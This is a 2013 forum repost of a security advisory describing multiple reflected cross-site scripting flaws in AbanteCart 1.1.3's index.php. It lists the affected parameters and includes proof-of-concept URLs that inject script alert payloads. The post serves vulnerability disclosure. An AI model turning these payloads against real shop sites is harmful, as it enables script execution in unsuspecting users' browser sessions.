Praetorian503 Posted February 13, 2013 Report Posted February 13, 2013 AbanteCart version 1.1.3 suffers from multiple cross site scripting vulnerabilities.AbanteCart 1.1.3 (index.php) Multiple Reflected XSS VulnerabilitiesVendor: Belavier CommerceProduct web page: http://www.abantecart.comAffected version: 1.1.3Summary: AbanteCart is a free PHP based eCommerce solution formerchants to provide ability creating online business and sellproducts online quick and efficient.Desc: AbanteCart suffers from multiple reflected cross-site scriptingvulnerabilities. The issues are triggered when input passed via severalparameters to 'index.php' script is not properly sanitized before beingreturned to the user. This can be exploited to execute arbitrary HTMLand script code in a user's browser session in context of an affectedsite.Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25aVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2013-5125Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5125.php08.02.2013--Affected parameters: limit, page, rt, sort, currency, product_id, language, s, manufacturer_id, token.PoC:http://localhost/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3Ehttp://localhost/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/producthttp://localhost/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3Ehttp://localhost/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3ESource: PacketStorm Quote
